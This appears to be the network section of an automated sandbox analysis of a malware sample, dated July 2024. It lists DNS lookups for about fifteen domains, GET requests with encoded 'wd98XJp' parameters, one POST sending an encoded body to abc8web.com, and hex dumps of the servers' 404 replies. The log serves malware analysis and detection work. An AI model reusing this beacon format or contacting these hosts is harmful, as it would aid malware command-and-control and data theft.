          Source: global trafficHTTP traffic detected: GET /efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.coinwab.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mqmsqkw.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.synergon.spaceConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adoby.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.washio.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.6666111p.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.0araba.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: www.miningarea.fun
          Source: global trafficDNS traffic detected: DNS query: www.kosherphonestore.com
          Source: global trafficDNS traffic detected: DNS query: www.abc8web.com
          Source: global trafficDNS traffic detected: DNS query: www.threendresses.com
          Source: global trafficDNS traffic detected: DNS query: www.personalcaresale.shop
          Source: global trafficDNS traffic detected: DNS query: www.coinwab.com
          Source: global trafficDNS traffic detected: DNS query: www.mqmsqkw.lol
          Source: global trafficDNS traffic detected: DNS query: www.synergon.space
          Source: global trafficDNS traffic detected: DNS query: www.wepayassessments.com
          Source: global trafficDNS traffic detected: DNS query: www.adoby.xyz
          Source: global trafficDNS traffic detected: DNS query: www.washio.world
          Source: global trafficDNS traffic detected: DNS query: www.com-kh.com
          Source: global trafficDNS traffic detected: DNS query: www.6666111p.vip
          Source: global trafficDNS traffic detected: DNS query: www.0araba.net
          Source: global trafficDNS traffic detected: DNS query: www.rtrpodcast.online
          Source: unknownHTTP traffic detected: POST /sm5e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.abc8web.comOrigin: http://www.abc8web.comReferer: http://www.abc8web.com/sm5e/Connection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 77 64 39 38 58 4a 70 3d 6c 2b 5a 6d 35 36 4a 6c 6b 53 54 42 56 4a 76 30 56 36 4b 6b 41 4f 4b 4f 69 69 61 4e 55 6a 37 76 7a 31 75 33 4f 65 49 61 57 50 71 48 46 2f 69 67 2f 45 30 76 52 4c 4c 4e 77 6b 4b 34 6b 78 78 6e 56 36 35 61 53 38 59 76 6e 67 70 76 33 6e 37 6f 48 53 45 79 38 38 4e 2f 6f 74 54 6a 41 45 4d 37 47 2f 6f 34 33 4d 48 71 56 5a 4a 32 6b 38 61 4a 67 52 2b 4a 37 43 38 52 75 6c 72 43 36 56 4e 73 74 2f 75 33 51 70 54 69 67 42 71 61 51 43 46 39 55 66 67 69 36 55 51 31 2b 2f 34 39 63 59 35 37 43 4c 38 47 33 66 51 62 6f 6a 73 51 6d 65 64 70 7a 47 7a 61 6d 6e 52 37 74 51 34 34 71 53 57 59 49 67 3d 3d Data Ascii: wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yvngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgQ6PgazQjAPUs2hqKekXcmDvbNnJlO6Id6UqY8pMnUc5myRrVKxyyC6sEnavsTGfhPch7olsMUBk%2FINfw1pTT0XMj0eLzMq%2FEQ1mWIh1dMeSJsQtHuYNcapZGo41JkSk9SPkanK1AfcS1ZH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce840689ae4205-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=debBEllbuh7hmv%2Fkp%2BYCMaDVvz7Mwcgdti%2BENkmS3GcqLtw7019zPl2UQ01E4vOlOObWvNj3kSAR6GEaZofestAG3IESC%2FT6GeY7Qh4Za1tpYi6qNlfsLT2ESZMeXgyVGF%2Bp9pyA39JOMZfP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce84167bac1821-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9BYAb5vbW1K6nC6RV4oLXf16PUUuQXZfWNp%2BuEyOlPEOdo89STy8vh%2BorYzM27u9U6trgm3Lgfprxg28XYGrqoPf%2FzuEYHkFsB2d0a%2F%2BjzSxuN%2F9yZb1ZAI9Ro6Qn%2BgqjVO7ci51e2g4QgV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce84263eea8cd4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:07:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4pVlZTadzumTYubhaf45%2BwB%2FNrUygRG3bkw8VZLNM3tXwK%2BTlA00iq3qIhkI%2BUzQdD4cEG2XkKKVD4bt%2FeKFQGjGJvRZE9CqgCFT8qCPVgv80ZuozuWyEjN7wwfT21MMtJbYKKQ6u0n2Fnz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ce843659f5437b-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:31 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:34 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Tue, 02 Jul 2024 12:08:37 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 2247date: Tue, 02 Jul 2024 12:08:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 64 68 6f 73 74 69 6e 67 2e 70 6c 20 2d 20 70 6f 64 20 74 79 6d 20 61 64 72 65 73 65 6d 20 6e 69 65 20 7a 6e 61 6a 64 75 6a 65 20 73 69 c4 99 20 c5 bc 61 64 65 6e 20 73 65 72 77 69 73 20 57 57 57 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 33 33 33 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 69 6d 67 7b 0d 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 23 74 72 65 73 63 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 7d 0d 0a 23 66 6f 6f 74 7b 0d 0a 66 6f 6e 74 3a 20 31 30 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 62 6f 74 74 6f 6d 3a 35 70 78 3b 0d 0a 77 69 64 74 68 3a 39 39 25 3b 0d 0a 